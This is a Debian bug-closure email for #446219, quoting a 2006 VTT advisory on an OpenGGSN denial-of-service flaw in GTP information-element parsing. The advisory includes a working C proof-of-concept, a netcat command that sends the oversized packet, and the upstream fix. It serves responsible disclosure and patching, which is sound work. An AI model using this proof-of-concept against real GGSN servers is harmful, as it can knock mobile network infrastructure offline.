Your message dated Fri, 30 May 2008 14:49:19 +0100
with message-id <[EMAIL PROTECTED]>
and subject line openggsn has been removed from Debian, closing #446219
has caused the Debian Bug report #446219,
regarding openggsn: Fix for remote DoS in GTPIE parsing
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)
--
446219: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=446219
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: openggsn
Severity: important
Tags: security patch etch
This was sent to [EMAIL PROTECTED] in 2006:
OpenGGSN Denial of Service Vulnerability
TNT project:
http://www.vtt.fi/proj/tnt/index.jsp?lang=en
Copyright © 2006 VTT
Abstract
OpenGGSN is an open source implementation of a Gateway GPRS Support Node
(GGSN). It is used by mobile operators as an interface between the Internet and
the rest of the mobile network infrastructure. A Denial of Service (DoS)
vulnerability -- caused by an infinite loop in GTPIE parsing when a UDP packet
with more than GTPIE_SIZE (256) elements is received -- was found with the
Codenomicon GTP test suite. A fix developed by VTT is provided with this
advisory.
-------------------------------------------------------------------------------
Table of Contents
Background
GTP
OpenGGSN
Codenomicon GTP Test Suite
Affected Products
Details
Exploiting The Vulnerability
Fix
About VTT
Background
GTP
http://en.wikipedia.org/wiki/GPRS_Tunnelling_Protocol
GPRS Tunnelling Protocol (or GTP) is an IP based protocol used within GSM and
UMTS networks. The GTP protocol is layered on top of UDP. There are in fact
three separate protocols, GTP-C, GTP-U and GTP'. GTP-C is used within the GPRS
core network for signalling between GPRS Support Nodes (GGSNs and SGSNs). This
allows the SGSN to activate a session on the users behalf (PDP context
activation), to deactivate the same session, to adjust quality of service
parameters or to update a session for a subscriber who has just arrived from
another SGSN. GTP-U is used for carrying user data within the GPRS core network
and between the Radio Access Network and the core network. The user data
transported can be packets in any of IPv4, IPv6 or PPP formats.
OpenGGSN
http://www.openggsn.org
OpenGGSN is an open source implementation of a Gateway GPRS Support Node
(GGSN). It is used by mobile operators as the interface between the Internet
and the rest of the mobile network infrastructure.
Codenomicon GTP Test Suite
http://www.codenomicon.com/products/telecommunications/gtp/
Codenomicon GTP Test Tools help proactively eliminate security flaws in GTP
implementations. The test tool converts your test workstation into a GPRS
Support Node for testing the robustness of GPRS Tunneling Protocol (GTP)
implementations. The test tools test GTP implementations for development flaws
using the unique Codenomicon fault injection technology.
Affected Products
* OpenGGSN versions 0.83 and 0.84
Details
VTT's TNT project (http://www.vtt.fi/proj/tnt/index.jsp?lang=en) used
Codenomicon
GTP test suite to test an OpenGGSN installation based on Debian unstable/sid
distribution. One of the findings is that running any testcase containing
a message with more than 256 information elements in the payload caused
the OpenGGSN to go into a infinite loop and thus causing an Denial of Service
condition and unnecessary consumption of CPU resources.
Exploiting The Vulnerability
The attacker can make a Denial of Service attack simply by sending a UDP
message containing more than 256 information elements to the OpenGGSN server.
/*
* OpenGGSN - Gateway GPRS Support Node
* Copyright (C) 2002, 2003, 2004 Mondru AB.
*
* The contents of this file may be used under the terms of the GNU
* General Public License Version 2, provided that the above copyright
* notice and this permission notice is included in all copies or
* substantial portions of the software.
*
* Copyright (C) 2006 VTT
*/
/*
* Proof of concept for OpenGGSN GTPIE parsing Denial-of-Service condition.
*
* compile in openggsn-0.84/gtp directory:
* cc -Wall -g -O0 -L.libs -lgtp gtpie_dos.c -o gtpie_dos
* run OpenGGSN:
* ./ggsn --fg --debug -c ../examples/ggsn.conf -l 127.0.0.1
* run PoC:
* ./gtpie_dos | nc -q 0 -u 127.0.0.1 3386
* resulting DoS:
* PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
* 29972 root 25 0 133m 3488 1412 R 98.5 0.3 0:05.23 lt-ggsn
* UDP payload:
* ./gtpie_dos | hexdump -x
* 0000000 101e 0202 0100 0000 ffff ffff beef dead
* 0000010 0000 0000 0101 0101 0101 0101 0101 0101
* 0000020 0101 0101 0101 0101 0101 0101 0101 0101
*
* 0000210 0101 0101 0101
* 0000216
*/
#include <stdio.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include "pdp.h"
#include "gtp.h"
#include "gtpie.h"
int main(void)
{
int i;
struct gtp0_packet *packet=calloc(1, sizeof(struct gtp0_packet));
/* header*/
struct gtp0_header *gtp0 = (struct gtp0_header*) packet;
/* Initialise "standard" GTP0 header */
gtp0->flags=0x1e;
gtp0->type=hton8(GTP_CREATE_PDP_REQ);
gtp0->spare1=0xff;
gtp0->spare2=0xff;
gtp0->spare3=0xff;
gtp0->number=0xff;
gtp0->seq=hton16(0x1);
gtp0->flow=0;
gtp0->tid=0xdeadbeef;
int length = GTP0_HEADER_SIZE;
/* data */
uint8_t qr=0x1;
for (i=0; i<=GTPIE_SIZE; i++) {
gtpie_tv0(packet, &length, GTP_MAX, GTPIE_CAUSE,
sizeof(qr), &qr);
}
gtp0->length = hton16(length - GTP0_HEADER_SIZE);
write(STDOUT_FILENO, (void *) packet, (size_t) length);
return 0;
}
Fix
The problem lies in the parsing of information elements in GTP messages, which
is implemented in the gtpie_decaps function of gtp/gtpie.c file.
The implementation has a bug that does not check if there are too many
information elements in the message thus causing the software to loop
infinitely in the while-loop.
In addition, handling routine for the error situation had to be implemented
outside the while-loop.
--- openggsn-0.84.orig/gtp/gtpie.c
+++ openggsn-0.84/gtp/gtpie.c
@@ -188,7 +188,7 @@
memset(ie, 0, 4 * GTPIE_SIZE);
- while (p<end) {
+ while ((p<end) && (j<GTPIE_SIZE)) {
if (GTPIE_DEBUG) {
printf("The packet looks like this:\n");
for( i=0; i<(end-p); i++) {
@@ -346,6 +346,10 @@
(unsigned long) p, (unsigned long) end);
return 0; /* We landed at the end of the packet: OK */
}
+ else if (!(j<GTPIE_SIZE)) {
+ if (GTPIE_DEBUG) printf("GTPIE too many elements.\n");
+ return EOF; /* We received too many information elements */
+ }
else {
if (GTPIE_DEBUG) printf("GTPIE exceeded end of packet. %lx %lx\n",
(unsigned long) p, (unsigned long) end);
About VTT
http://www.vtt.fi/?lang=en
VTT is an impartial expert organisation. Its objective is to develop new
technologies, create new innovations and value added thus increasing customer's
competencies. With its know how VTT produces research, development, testing and
information services to public sector and companies as well as international
organisations.
--- End Message ---
--- Begin Message ---
Version: 0.84-3+rm
The openggsn package has been removed from Debian testing, unstable and
experimental, so I am now closing the bugs that were still opened
against it.
For more information about this package's removal, read
http://bugs.debian.org/424611 . That bug might give the reasons why
this package was removed, and suggestions of possible replacements.
Don't hesitate to reply to this mail if you have any question.
Thank you for your contribution to Debian.
--
Marco Rodrigues
http://Marco.Tondela.org
--- End Message ---